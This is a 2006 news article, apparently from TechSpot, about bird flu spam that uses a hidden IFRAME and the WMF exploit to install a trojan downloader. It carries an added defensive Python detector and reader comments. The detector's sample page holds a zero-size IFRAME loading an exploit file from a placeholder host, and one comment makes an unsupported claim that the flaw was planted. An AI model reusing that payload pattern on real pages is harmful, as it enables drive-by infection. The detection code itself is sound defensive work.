Bird flu e-mail spams WMF trojan

By Derek Sooman on February 7, 2006, 8:01 PM
More trouble is brewing around the WMF vulnerability in unpatched Windows systems. Security experts are warning of spam emails that play on the growing fear of a bird flu epidemic to trick users into visiting a website that runs malicious code.

Using the subject "Attention Bird Flu in England", the mail tries to get users to click on a link to either of two websites for more information (or rather, to run malware!).

Upon clicking on a link, users are directed to a website which claims that you have been blocked from accessing it. This appears to be another trick by the attacker to make the user believe that the site has either been disabled or shut down.

Within the HTML, an IFRAME is loaded that uses the recent WMF exploit to run code without user intervention. The code is a Trojan horse downloader, which connects to another site to download new malicious code. The filename is "expl1.wmf," which downloads and runs "expl1.exe," Websense Security Labs warned.
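
A defender triaging saved copies of such pages or mail-gateway captures can look for the delivery pattern described above. The following is an added example, not code from Websense or TechSpot: it flags elements that load a `.wmf` resource without a click. The host name, the sample page and every function name are constructed for illustration, and covering tags other than IFRAME is a generalization beyond the case in the article.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags whose URL attribute makes the browser fetch and render a resource
# without a click. The article names IFRAME; the others are an added generalization.
AUTO_LOAD = {"iframe": "src", "frame": "src", "img": "src", "embed": "src", "object": "data"}


class WmfEmbedFinder(HTMLParser):
    """Collect auto-loading elements whose URL path ends in .wmf."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names before calling this.
        url_attr = AUTO_LOAD.get(tag)
        if url_attr is None:
            return
        attr_map = {k: (v or "") for k, v in attrs}
        url = attr_map.get(url_attr, "")
        # Compare the path only, so query strings and case do not hide the extension.
        if urlparse(url).path.lower().endswith(".wmf"):
            hidden = attr_map.get("width") in ("0", "1") or attr_map.get("height") in ("0", "1")
            self.findings.append({"tag": tag, "url": url, "hidden": hidden})


def find_wmf_embeds(html):
    finder = WmfEmbedFinder()
    finder.feed(html)
    return finder.findings


# Constructed sample: a decoy "blocked" page like the one described, on a placeholder host.
SAMPLE_PAGE = """
<html><body>
<h1>Access to this site has been blocked</h1>
<IFRAME SRC="http://malicious.example/expl1.wmf?id=7" width="0" height="0"></IFRAME>
<img src="/images/logo.gif">
</body></html>
"""

if __name__ == "__main__":
    for hit in find_wmf_embeds(SAMPLE_PAGE):
        print(hit)
```

The extension match is a triage signal only: a metafile served under another file name would not be caught this way and needs content inspection.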




User Comments: 8

cyrax said:
Jeez. It's only a real sicko would make light of the situation like that. But I supposed it was inevitable. That's the sad thing, isn't it?
MonkeyMan said:
This is why you should never click on any ads whatsoever. I think I may have a few of these malware thingys in my system, but I'll just have to run a virus scan, and adware, and it will get rid of them in no time.
Need_a_Dell said:
Why are people so gullible? If someone wants information on something, they should look for it themselves, it should not be offered to them freely by an unknown source. These people need to wisen up and get with the program. As Agent Mulder once said, "Trust no one". (He probably said it more than once, but you know what I mean!)
blue_dragon said:
you what amazes me...I never get trojans or viruses...it's weird..I've never really experienced problems...maybe it cuz I visit windows update every other day..hehe
nathanskywalker said:
"Why are people so gullible?"
The will to be ignorant and have tech support serve them perhaps?
Wow, I do believe someone who works at MS said something about that error either being planted, or that someone on the inside has a way to access and exploit it. Whatever the case, when will this stop? This is amazing, hackers are definitely taking full advantage of this. Between this and other recent viruses, good virus scanners are going to have their hands full.
But really, when will people learn to ignore and delete emails from people and addresses they don't know? Or better yet, start the computer in safe run a complete scan for ad-ware, spyware, and mal-ware? If the market weren't so easy to break some of the thieves would go home.
Cartz said:
Originally posted by blue_dragon: "you what amazes me...I never get trojans or viruses...it's weird..I've never really experienced problems...maybe it cuz I visit windows update every other day..hehe"
It's actually very easy to keep yourself safe, I rarely even get tracking cookies on my system (I set IE to prompt me before dling 3rd party cookies). I've only once had a virus, WIN98.CIH, and I got that from a friend's burned CD that he had given me (mp3s and the original winamp).
Unfortunately, it's the people that click the 'GET TEN THOUSAND FREE SMILEYS' popups when they appear, the ones that frequent the less than reputable sites or the ones that open any email attachment that happens to hit their inbox that start the spread of infections. These people are also the ones who don't think that the subscription costs for an AV scanner are worth it, and are too tech-illiterate to know about the free alternatives. The rule of thumb is, if you don't recognize the source, delete the email, regardless of what it contains. If it's important, the person will get in touch with you some other way.
Kaleid said:
"I've only once had a virus, WIN98.CIH, and I got that from a friend's burned CD that he had given me (mp3s and the original winamp)."
Ditto, can't remember quite what was in that cd-r though. Since then I've been using anti-virus programs regularly and for the last couple of years or so also been using adaware and spybot to keep out tracking cookies...
enasni said:
I figure that if you don't have the bird flu and you don't own any birds that are foaming at the mouth then it is pointless to read the e-mail about bird flus. Bird flu isn't a horrible epidemic sweeping the world once over, it's just a problematic virus that will be contained soon enough. As for the malware writer who created it...YOU SUCK!